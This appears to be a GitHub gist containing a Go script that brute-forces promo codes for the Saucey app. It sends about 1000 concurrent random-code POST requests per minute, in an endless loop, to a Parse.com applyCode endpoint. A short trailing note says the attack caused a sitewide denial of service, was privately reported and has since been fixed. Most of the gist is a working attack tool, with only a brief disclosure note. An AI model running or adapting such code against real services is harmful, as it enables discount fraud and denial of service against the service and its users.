Bruteforce saucey promocodes

gistfile1.txt

package main

import (
	"bytes"
	log "github.com/Sirupsen/logrus"
	"io/ioutil"
	"math/rand"
	"net/http"
	"sync"
	"time"
)

func req() {

	const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"

	b := make([]byte, 6)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}

	url := "https://api.parse.com/1/functions/applyCode"
	var jsonStr = []byte(`{"promoCode":"` + string(b[:6]) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)
	req, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
	req.Header.Set("X-Custom-Header", "myvalue")
	req.Header.Set("Content-Type", "application/json")

	client := &http.Client{}
	resp, err := client.Do(req)
	if err != nil {
		log.Error(err.Error())
	}
	defer resp.Body.Close()

	//fmt.Println("response Status:", resp.Status)
	//fmt.Println("response Headers:", resp.Header)
	body, _ := ioutil.ReadAll(resp.Body)
	log.Info(string(body))
}

func main() {
	for {
		wg := sync.WaitGroup{}
		// try not to exceed parse.com api ratelimiting
		for i := 1; i < 1000; i++ {
			go func() {
				wg.Add(1)
				defer wg.Done()
				req()
			}()
		}
		wg.Wait()
		time.Sleep(60 * time.Second)
	}
}

Bruteforcing sauceyapp promocodes cased a sitewide DOS due to global API ratelimiting. This issue was reported privately and fixed a while back.

https://www.ibuildings.nl/blog/2015/11/hidden-plain-sight-brute-forcing-slack-private-files to get an idea of how long it would take